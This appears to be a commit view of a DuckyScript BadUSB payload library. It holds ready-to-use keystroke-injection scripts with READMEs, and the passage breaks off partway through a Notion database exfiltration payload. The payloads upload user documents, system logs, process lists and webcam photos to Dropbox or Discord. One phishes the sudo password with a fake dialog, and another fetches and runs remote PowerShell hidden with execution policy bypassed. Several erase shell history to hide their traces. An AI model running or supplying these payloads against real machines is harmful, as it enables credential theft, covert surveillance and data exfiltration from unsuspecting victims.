REM # Title : Set An Arbitrary DNS (IPv4 version) |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 11 |
REM # |
REM ########################################################
REM Requirements:
REM - Nothing
REM DNS IPv4 like Cloudflare DNS 1.1.1.1
DEFINE DNS example
DEFAULT_DELAY 500
REM Open Settings
GUI
STRING settings
ENTER
REM Go to network settings
REPEAT 3 DOWNARROW
ENTER
REM Go to Wi-Fi settings
REPEAT 4 TAB
ENTER
REM Go to hardware properties settings
REPEAT 16 TAB
ENTER
REM DNS Settings
REPEAT 2 TAB
ENTER
REM Change to manual
SPACE
DOWNARROW
ENTER
REM Set the DNS server
TAB
SPACE
TAB
STRING DNS
TAB
ENTER
REM Save settings
DOWNARROW
ENTER
REPEAT 5 TAB
ENTER
ALT F4

30
payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/README.md Normal file
View File

@ -0,0 +1,30 @@
# Starting a PowerShell with administrator permissions in Windows 10/11
This script can be considered by people who are new to the world of scripts written in DuckyScript so that they can understand how to start a PowerShell with administrator permissions on a Windows machine.
**Category**: Execute
## Description
This script can be considered by people who are new to the world of scripts written in DuckyScript so that they can understand how to start a PowerShell with administrator permissions on a Windows machine.
Starting a PowerShell session with administrator privileges means the session has access to features and operations that require high permissions on the Windows operating system.
Some PowerShell commands require administrator privileges to run properly. Starting PowerShell as an administrator allows you to execute commands that require elevated permissions, such as managing system services, changing security settings, creating or modifying user accounts, installing system-level software, and so on.
It is important to note that running PowerShell with administrator privileges involves a higher level of responsibility and can cause significant changes to the system. Therefore, it is advisable to be careful and fully understand the effects of operations performed in a session with administrator privileges to avoid unwanted or harmful changes.
## Dependencies
* Nothing
## Example
- `STRINGLN Get-ExecutionPolicy -List`
![](docs/1.png)
- `STRINGLN Set-ExecutionPolicy Bypass`
![](docs/2.png)
- `STRINGLN Get-ExecutionPolicy -List`
![](docs/3.png)

BIN
payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/docs/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 25 KiB

BIN
payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/docs/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 57 KiB

BIN
payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/docs/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 65 KiB

25
payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows/payload.txt Normal file
View File

@ -0,0 +1,25 @@
REM ####################################################################################
REM # |
REM # Title : Starting a PowerShell with administrator permissions in Windows |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execute |
REM # Target : Windows 10-11 |
REM # |
REM ####################################################################################
REM Requirements:
REM - Nothing
DEFAULT_DELAY 500
GUI x
STRING a
LEFTARROW
ENTER
DELAY 2000
STRINGLN Get-ExecutionPolicy -List
STRINGLN Set-ExecutionPolicy Bypass
STRINGLN Get-ExecutionPolicy -List
ALT F4

21
payloads/library/execution/Stop_A_Single_Process_In_Windows/README.md Normal file
View File

@ -0,0 +1,21 @@
# Stop A Single Process In Windows
This script can be used to quickly stop an active process on a windows machine.
**Category**: Execution
## Description
This script can be used to quickly stop an active process on a windows machine.
This script open the Task Manager app, then go to search bar, then write the process name that want to be stopped, open the right click mouse menu and click the end task option, then close the task manager app.
## Dependencies
* Nothing
## Settings
- Write the name of the process that you want to stop
`DEFINE PROCESS_NAME example`

38
payloads/library/execution/Stop_A_Single_Process_In_Windows/payload.txt Normal file
View File

@ -0,0 +1,38 @@
REM #####################################################
REM # |
REM # Title : Stop A Single Process In Windows |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM #####################################################
REM Requirements:
REM - Nothing
REM Write the name of the process that you want to stop
DEFINE PROCESS_NAME example
DEFAULT_DELAY 500
REM Open Task Manager
GUI
STRINGLN Task Manager
REM Goto search bar
REPEAT 4 TAB
REM Write the process name
STRINGLN PROCESS_NAME
REPEAT 4 TAB
REM Open the menu and close it ending the task
SHIFT F10
REPEAT 2 DOWNARROW
ENTER
DELAY 2000
REM Close the task manager
ALT F4

20
payloads/library/execution/UninstallSignal/README.md Normal file
View File

@ -0,0 +1,20 @@
# Uninstall Signal
A script used to uninstall signal-desktop app on Windows users.
**Category**: Execution
## Description
A script used to uninstall signal-desktop app on Windows users.
Open a PowerShell, stop the Signal proccess if it runs and then execute the uninstall file trhough general path.
## Dependencies
* Signal App installed (obviously LOL)
* ExecutionPolicy Bypass
## Settings
- Nothing to set, this payload is Plug-And-Play <3

30
payloads/library/execution/UninstallSignal/payload.txt Normal file
View File

@ -0,0 +1,30 @@
REM #####################################
REM # |
REM # Title : Uninstall Signal |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM #####################################
REM Plug-And-Play <3
REM Requirements:
REM - Signal App installed
REM - ExecutionPolicy Bypass
DELAY 2000
GUI r
DELAY 1000
STRING powershell
ENTER
DELAY 2000
STRINGLN Stop-Process -Name "Signal"
DELAY 500
STRINGLN Start-Process "$env:LocalAppData\Programs\signal-desktop\Uninstall Signal.exe"
DELAY 1000
REM Popup "Are you sure?"
ENTER
ALT F4

25
payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/README.md Normal file
View File

@ -0,0 +1,25 @@
# Uninstall A Specific App On Windows Through Control Panel
This script can be used to uninstall a specific app on a Windows System.
**Category**: Execute
## Description
This script can be used to uninstall a specific app on a Windows System.
The script opens the research app and go to `Uninstall or change a program` page using the default path `Control Panel\Programs\Programs and Features`, then go to the search bar and write the app name, then got on the app, press space to select and enter to uninstall it.
When uninstalling an application through the Windows Control Panel, it may not always be enough, especially for complex programs like antivirus software. In such cases, specific uninstaller applications are often required to ensure the complete removal of all components and avoid leaving behind residual files or registry entries. While most standard applications can be successfully uninstalled through the Control Panel, complex or security-related programs may benefit from using specific uninstaller applications for a more thorough and complete removal and, in that cases, this script doesn't work.
**Unauthorized removal of an application is considered a crime** and can result in severe consequences. Tampering with system files without permission violates cybersecurity laws and can lead to legal penalties.
In addition to legal implications, **unauthorized removal of an application can also pose permanent risks to files and system functionality**. Applications are designed to work within a specific environment, and sudden or improper removal can cause instability, errors, and permanent data loss.
## Dependencies
* Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)`
```DuckyScript
DEFINE APP_NAME example
```

43
payloads/library/execution/Uninstall_A_Specific_App_On_Windows_Through_Control_Panel/payload.txt Normal file
View File

@ -0,0 +1,43 @@
REM ##############################################################################
REM # |
REM # Title : Uninstall A Specific App On Windows Through Control Panel |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execute |
REM # Target : Windows 10/11 |
REM # |
REM ##############################################################################
REM Requirements:
REM - The application you want to uninstall must be installed on the target (?obvious right? ^^)
REM Note:
REM - Payload tested on Windows 11 Eng
REM Set the exact name of the application as it appears within the control panel. Do not assume that just because an application is known by a certain name then it will have exactly that name, e.g. `Firefox` shows up again as `Mozilla Firefox (x64 en)`
DEFINE APP_NAME example
DEFAULT_DELAY 500
REM Open Windows research
GUI
REM Search and open explorer app
STRINGLN explorer
REM Goto search bar and open "Uninstall or change a program" page
REPEAT 3 TAB
ENTER
STRINGLN Control Panel\Programs\Programs and Features
DELAY 1000
REM Goto search bar and search the app
REPEAT 4 TAB
STRING APP_NAME
REM Select the app and click on it
REPEAT 6 TAB
SPACE
REPEAT 2 ENTER
DELAY 2000
ALT F4

34
payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/README.md Normal file
View File

@ -0,0 +1,34 @@
# Create And Exfiltrate A Webhook Of Discord
This script allows you to create a Webhook of a Discord server quickly and exfiltrate it. For demonstration purposes another Discord webhook was used for exfiltration but of course any method you prefer can be used.
**Category**: Exfiltration
## Description
This script allows you to create a Webhook of a Discord server quickly and exfiltrate it. For demonstration purposes another Discord webhook was used for exfiltration but of course any method you prefer can be used.
First of all open Discord trough Windows GUI, the open time may vary depending on the pc and whether there may be updates that need to be done. When it is open, search the server using a Discord keyboard shortcut *\<server_name>, then go to first channel and open the settings using TABx11, then go to Integration settings using TABx6 and DOWN_ARROWx3, then create a Webhook (Because it may happen that there is still not even one) and copy the first reachable, then close Discord.
To do the exfiltration I decided to use another discord webhook but of course you can use whatever exfiltration method you prefer.
**Stealing a Discord webhook without authorization is considered a cybercrime**. Acquiring a webhook without proper permission is a violation of digital security and can be subject to legal consequences.
## Dependencies
* Discord Installed
* Internet connection
## Settings
- You must define the Discord server name i.e. Hak5
`DEFINE SERVER_NAME example`
- You must define your Dropbox accessToken or modify the exfiltration modality.
`DEFINE DROPBOX_ACCESS_TOKEN example`
- The open time may vary depending on the pc and whether there may be updates that need to be done
`DELAY 6000`

76
payloads/library/exfiltration/Create_And_Exfiltrate_A_Webhook_Of_Discord/payload.txt Normal file
View File

@ -0,0 +1,76 @@
REM ###############################################################
REM # |
REM # Title : Create And Exfiltrate A Webhook Of Discord |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ###############################################################
REM Requirements:
REM - Internet connection
REM - Discord Installed
REM You must define the Discord server name i.e. Hak5
DEFINE #SERVER_NAME example
REM You must define your Discord webhook if you want to use this method for the exfiltration
DEFINE #DISCORD_WEBHOOK example
DEFAULT_DELAY 500
REM Open Discord app
GUI
STRINGLN Discord
REM It depends
DELAY 6000
REM Search by Discord keyboard shortcut and open it
CTRL k
STRING *
STRINGLN #SERVER_NAME
REM Go to first channel and open the settings
REPEAT 11 TAB
ENTER
REM Open Integrations section
REPEAT 6 TAB
REPEAT 3 DOWNARROW
ENTER
REM Webhooks settings
REPEAT 2 TAB
ENTER
REM Create Webhook
REPEAT 3 TAB
ENTER
REM Select first Webhook
TAB
ENTER
REM Copy Webhook
REPEAT 5 TAB
SPACE
REM Close Discord
ALT F4
REM Open a PowerShell
GUI r
STRINGLN powershell
DELAY 2000
REM Exfiltration using Discord Webhook
STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK"
STRING $Payload = @{content = "
CTRL v
STRINGLN "} | ConvertTo-Json
STRINGLN Invoke-RestMethod -Uri $WebhookUrl -Method Post -Body $Payload -ContentType 'application/json'; exit;

32
payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md Normal file
View File

@ -0,0 +1,32 @@
# Exfiltrate Linux Content With Dropbox - BADUSB ✅
A script used to take folder content on Linux Systems.
**Category**: Exfiltration, Execution
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
## Description
A script used to take folder content on Linux Systems.
Opens a shel, zip all zippable (R permission) content of the folder, send the zip into the dropbox folder, delete shell history.
## Getting Started
### Dependencies
* Internet Connection
* Linux System
* * Terminal that can be opened by the shortcommand CTRL-ALT t
* DropBox Account for the access token
### Executing program
* Plug in your device
### Settings
* Set your dropbox access token
* Set the folder path interessed (i.e. /Documents)
* Change (if you think that it is necessary) the delay of the zipping operation

49
payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/payload.txt Normal file
View File

@ -0,0 +1,49 @@
REM ##########################################################
REM # |
REM # Title : Exfiltrate Linux Content With Dropbox |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##########################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
REM Required: Set here your Dropbox access TOKEN
DEFINE #TOKEN example
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
DEFAULT_DELAY 500
CTRL-ALT t
DELAY 2000
STRINGLN ACCESS_TOKEN="#TOKEN"
STRINGLN USER_NAME=$(whoami)
STRINGLN path="/home/$USER_NAME/Documents"
STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
STRINGLN NAME="$RANDOM.zip"
STRINGLN ZIP_PATH="$path/$NAME"
REM The FOLDER that you want to zip, in this example you want to zip all Documents content
STRINGLN FOLDER="/home/$USER_NAME/Documents/"
REM Delay for zipping operation, it depends by computer power and folder directory
DELAY 10000
STRINGLN if [ -r "$FOLDER" ]; then
STRINGLN zip -r "$ZIP_PATH" "$FOLDER" > /dev/null 2>&1
STRINGLN else
STRINGLN echo ""
STRINGLN fi
STRINGLN DROPBOX_FOLDER="/$NAME"
STRINGLN curl -X POST DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
DELAY 2000
STRINGLN history -c

33
payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md Normal file
View File

@ -0,0 +1,33 @@
# Exfiltrate Linux Log Files - BADUSB ✅
A script used to take linux logs.
**Category**: Exfiltration, Execution
[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
## Description
A script used to take linux logs.
Opens a shel, zip all zippable (R permission) content of the log folder, send the zip into the dropbox folder, delete tmp folder.
## Getting Started
### Dependencies
* Internet Connection
* Linux System
* * Terminal that can be opened by the shortcommand CTRL-ALT t
* DropBox Account for the access token
### Executing program
* Plug in your device
### Settings
* Set your dropbox access token
* Change if needed the folder path interessed (i.e. /var/log)
* Change (if you think that it is necessary) the delay of the zipping operation

54
payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt Normal file
View File

@ -0,0 +1,54 @@
REM ######################################################
REM # |
REM # Title : Exfiltrate Linux Logs With Dropbox |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration, Execution |
REM # Target : Linux |
REM # |
REM ######################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DEFINE #TOKEN example
DEFINE #DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
DEFAULT_DELAY 500
CTRL ALT t
REM Required: Set here your Dropbox access TOKEN
DELAY 2000
STRINGLN ACCESS_TOKEN="#TOKEN"
STRINGLN USER_NAME=$(whoami)
REM Create random num
STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
REM Folder path
STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
REM Zip path
STRINGLN ZIP_NAME="$RANDOM.zip"
STRINGLN ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
REM Default log path
STRINGLN LOG_PATH="/var/log/"
STRINGLN zip -r "$ZIP_PATH" "$LOG_PATH"
REM Delay of zipping operation - it depends
DELAY 10000
STRINGLN DROPBOX_FOLDER="/$ZIP_NAME"
REM Send to Dropbox function
STRINGLN curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
REM Send timing - it depends
DELAY 5000
STRINGLN rm -rf "$TMP_FOLDER_PATH"

27
payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md Normal file
View File

@ -0,0 +1,27 @@
# Exfiltrate Network Configuration - Linux ✅
A script used to exfiltrate the network configuration on a Linux machine.
**Category**: Exfiltrate, Execution
## Description
A script used to exfiltrate the network configuration on a Linux machine.
Opens a shell, get the network card name, get the network configuration using nmcli, send the result to Dropbox, erase traces.
## Getting Started
### Dependencies
* Internet Connection
* Dropbox Token
### Executing program
* Plug in your device
### Settings
* Set the Dropbox token

58
payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt Normal file
View File

@ -0,0 +1,58 @@
REM ##########################################################
REM # |
REM # Title : Exfiltrate Linux Network Configuration |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##########################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
DEFINE #TOKEN example
DEFINE #DROPBOX_FOLDER_NAME example
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
DEFAULT_DELAY 500
CTRL ALT t
DELAY 2000
REM Required: Set here your Dropbox access TOKEN
STRINGLN ACCESS_TOKEN="#TOKEN"
REM STRING USER_NAME=$(whoami)
REM ENTER
STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
STRINGLN ZIP_NAME="$RANDOM.zip"
STRINGLN ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
REM Folder path
STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
STRINGLN nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
STRINGLN nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
STRINGLN nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
REM Delay for zipping operation, it depends by computer power and folder directory
STRINGLN zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
DELAY 3000
REM Set yout Dropbox folder name
STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
STRINGLN curl -X POST #DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
DELAY 2000
STRINGLN history -c
STRINGLN rm -rf "$TMP_FOLDER_PATH"
STRINGLN rm -rf "$ZIP_PATH"
STRINGLN exit

56
payloads/library/exfiltration/ExfiltratePhotosThroughShell/README.md Normal file
View File

@ -0,0 +1,56 @@
# Exfiltrate Photos Through Shell - Linux ✅
A script used to exfiltrate photos using fswebcam shell command.
**Category**: Exfiltration
## Description
A script used to exfiltrate photos using fswebcam shell command. The permissions is needed for give the executation permission to the script downloaded.
## Getting Started
### Dependencies
* An internet connection
* Linux system
* Dropbox Token, or whatever you want, for the exfiltration
* sudo permission
* 'fswebcam' installed but you can install it with the payload
### Executing program
* Plug in your device
### Settings
* Dropbox Token - You should change it into the script.sh file, line 7.
```Python
TOKEN=your_dropbox_token
```
* This section of sudo time depends by the computer power on which it runs. So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is (so 5000) set now or smaller depending on your needs.
```DuckyScript
STRING SUDO-PSWD
ENTER
REM DELAY Based On Computer Power
DELAY 5000
```
* If you want to install the fswebcam dependency, you should uncomment it. This DELAY (so 5000), like the previous one, is dynamic and in this case relies on the power of the Internet.
```DuckyScript
REM STRING apt install fswebcam -y
REM ENTER
REM DELAY Based On Internet Power
REM DELAY 5000
```
* Generally does not need much time
```DuckyScript
REM DELAY Based On Internet Power
DELAY 4000
```

52
payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt Normal file
View File

@ -0,0 +1,52 @@
REM ##################################################
REM # |
REM # Title : Exfiltrate Photos Through Shell |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##################################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Token for example, but you can use whatever you want for the exfiltration (i.e. smtp e-mail, Discord, Telegram and so on..)
REM - sudo permissions
REM - if you need to install 'fswebcam'
REM - for add the -x permission to the script.sh downloaded
REM REQUIRED - replace example.com with your script.sh link
DEFINE SCRIPT-SH-LINK example.com
REM REQUIRED - sudo Password
DEFINE SUDO-PSWD example
DELAY 1000
CTRL ALT t
DELAY 2000
REM #### Permission ####
REM This section of sudo time depends by the computer power on which it runs.
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
STRINGLN sudo su
DELAY 500
STRINGLN SUDO-PSWD
REM DELAY Based On Computer Power
DELAY 5000
REM If you want to install the dependency of fswebcam you should decommend it.
REM STRING apt install fswebcam -y
REM ENTER
REM DELAY Based On Internet Power
REM DELAY 5000
REM #### Script ####
STRINGLN curl #SCRIPT-SH-LINK > script.sh
REM DELAY Based On Internet Power
DELAY 4000
STRINGLN chmod +x script.sh
DELAY 500
STRINGLN nohup ./script.sh > /dev/null 2>&1 & exit

32
payloads/library/exfiltration/ExfiltratePhotosThroughShell/script.sh Normal file
View File

@ -0,0 +1,32 @@
#!/bin/bash
USER=$(whoami)
DIR=/home/$USER/tmp
TOKEN=your_dropbox_token
mkdir -p $DIR
function remove_folder {
rm -rf "$DIR"
rm -rf "/home/$USER/script.sh"
}
trap remove_folder EXIT
# execute the for, for some times..
for i in {1..10}
do
NAME=$(date +%s%N).jpg
fswebcam --no-banner $DIR/$NAME
curl -X POST https://content.dropboxapi.com/2/files/upload \
--header "Authorization: Bearer $TOKEN" \
--header "Dropbox-API-Arg: {\"path\": \"/$NAME\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" \
--header "Content-Type: application/octet-stream" \
--data-binary @$DIR/$NAME
sleep 60
done

27
payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/README.md Normal file
View File

@ -0,0 +1,27 @@
# Exfiltrate Process Info - Linux ✅
A script used to exfiltrate the process info on a Linux machine.
**Category**: Exfiltration
## Description
A script used to exfiltrate the process info on a Linux machine.
Opens a shell, get the process info, set the Discord webhook configuration, send it to the discord webhook, erase traces.
## Getting Started
### Dependencies
* Internet Connection
* Discord Webhook
### Executing program
* Plug in your device
### Settings
* Set the Discord Webhook configuration

42
payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt Normal file
View File

@ -0,0 +1,42 @@
REM ##########################################
REM # |
REM # Title : Exfiltrate Process Info |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM ##########################################
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
REM Required: Set here your Dropbox access TOKEN
DEFINE #TOKEN example
DEFINE #DROPBOX_FOLDER_NAME example
DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
DEFAULT_DELAY 500
CTRL ALT t
DELAY 2000
REM #### GET PROCESS SECTION ####
STRINGLN ps aux > process.txt
REM #### EXFILTRATE SECTION ####
STRINGLN ACCESS_TOKEN="#TOKEN"
STRINGLN USER_NAME=$(whoami)
STRINGLN TXT_PATH="/home/$USER_NAME/process.txt"
REM Set yout Dropbox folder name
STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
STRINGLN curl -X POST #DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
DELAY 2000
REM #### REMOVE TRACES ####
STRINGLN history -c
STRINGLN exit

36
payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/ExfiltrateProcessInfo.ps1 Normal file
View File

@ -0,0 +1,36 @@
<#
This function uploads the content of a file called "tasklist_output.txt" to Dropbox using Dropbox API.
Firstly, a temporary file is created using the New-TemporaryFile cmdlet of PowerShell.
Then, the tasklist /v command is used to get the running processes output on the computer.
The output is then written to the temporary file using the Out-File cmdlet.
The Dropbox API endpoint for uploading a file is set, and the API parameters such as the destination path of the file on Dropbox and access credentials are specified.
Finally, the Invoke-RestMethod cmdlet of PowerShell is used to send an HTTP POST request to the Dropbox API and upload the file.
#>
function ExfiltrateProcessInfo {
$localFilePath = New-TemporaryFile
$taskListOutput = tasklist /v
$taskListOutput | Out-File -FilePath $localFilePath
$dropboxFilePath = "/tasklist_output.txt"
# Required - Set here your Dropbox Token
$accessToken = "example.com"
$authHeader = @{Authorization = "Bearer $accessToken"}
$fileContent = Get-Content $localFilePath
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$headers = @{}
$headers.Add("Authorization", "Bearer $accessToken")
$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
$headers.Add("Content-Type", "application/octet-stream")
Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $fileContent
}
ExfiltrateProcessInfo

36
payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/README.md Normal file
View File

@ -0,0 +1,36 @@
# Exfiltrate Process Info - Windows ✅
A script used to exfiltrate process info.
**Category**: Exfiltration
## Description
A script used to exfiltrate process info.
This function uploads the content of a file called "tasklist_output.txt" to Dropbox using Dropbox API.
Firstly, a temporary file is created using the New-TemporaryFile cmdlet of PowerShell.
Then, the tasklist /v command is used to get the running processes output on the computer.
The output is then written to the temporary file using the Out-File cmdlet.
The Dropbox API endpoint for uploading a file is set, and the API parameters such as the destination path of the file on Dropbox and access credentials are specified.
Finally, the Invoke-RestMethod cmdlet of PowerShell is used to send an HTTP POST request to the Dropbox API and upload the file.
## Getting Started
### Dependencies
* An internet connection
* Windows 10,11
### Executing program
* Plug in your device
### Settings
* Dropbox Webhook

26
payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt Normal file
View File

@ -0,0 +1,26 @@
REM ##########################################
REM # |
REM # Title : Exfiltrate Process Info |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM ##########################################
REM Requirements:
REM - Internet Connection
REM - Dropbox Webhook
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
DEFINE PAYLOAD example.com
DELAY 2000
GUI r
DELAY 250
DELETE
STRING powershell -w h -ep bypass irm
STRING PAYLOAD
STRING | iex
ENTER

26
payloads/library/exfiltration/ExfiltrateSudoPasswordByPhishing_Linux/README.md Normal file
View File

@ -0,0 +1,26 @@
# Exfiltrate Sudo Password By Phishing - Linux ✅
A script used to exfiltrate the sudo password by a popup phishing based on linux systems.
**Category**: Credentials, Phishing
## Description
A script used to exfiltrate the sudo password by a popup phishing based on linux systems.
Opens a shell, get the password by a popup, send the input to a Discord webhook.
## Getting Started
### Dependencies
* Internet Connection
### Executing program
* Plug in your device
### Settings
* Set the Discord webhook

28
payloads/library/exfiltration/ExfiltrateSudoPasswordByPhishing_Linux/payload.txt Normal file
View File

@ -0,0 +1,28 @@
REM #######################################################
REM # |
REM # Title : Exfiltrate Sudo Password By Phishing |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Credentials, Phishing |
REM # Target : Linux |
REM # |
REM #######################################################
REM Requirements:
REM - Internet Connection
REM - Discord webhook
REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
DEFINE #WEBHOOK example.com
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### POPUP SECTION ####
STRINGLN WEBHOOK_URL="#WEBHOOK"
DELAY 500
REM All-in-one is important
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Verify Permissions" --password "Put your sudo password di continue" --default "password")\"}" $WEBHOOK_URL); history -c; exit;
ENTER

22
payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md Normal file
View File

@ -0,0 +1,22 @@
# Exfiltrates the entire database of the Notion client
This script can be used to exfiltrate the entire Notion database and thus all client-level content of your Notion account.
**Category**: Exfiltration
## Description
This script can be used to exfiltrate the entire Notion database and thus all client-level content of your Notion account.
Open a PowerShell, the get dinamically the Notion full-path and then add the `notion.db` string. Then create all the needed variables for the exfiltration and then send it trough Dropbox. I used Dropbox but you can use whatever you want.
## Dependencies
* Notion must be installed
* Internet Connection
## Settings
- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
`DEFINE DROPBOX_ACCESS_TOKEN "example"`

46
payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt Normal file
View File

@ -0,0 +1,46 @@
REM #########################################################################
REM # |
REM # Title : Exfiltrates the entire database of the Notion client |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Windows 10-11 |
REM # |
REM #########################################################################
REM Requirements:
REM - Notion must be installed
REM - Internet Connection
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example
GUI r
DELAY 1000
STRING PowerShell
ENTER
DELAY 2000
REM Setting about exfiltration
STRINGLN $accessToken = "#DROPBOX_ACCESS_TOKEN"
REM Settings about Notion DB
STRINGLN_BLOCK
$NotionPath = Join-Path -Path $env:APPDATA -ChildPath 'Notion'
$NotionDatabasePath = Join-Path -Path $NotionPath -ChildPath "notion.db"
$authHeader = @{Authorization = "Bearer $accessToken"}
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$dropboxFilePath = "/notion.db"
$headers = @{}
$headers.Add("Authorization", "Bearer $accessToken")
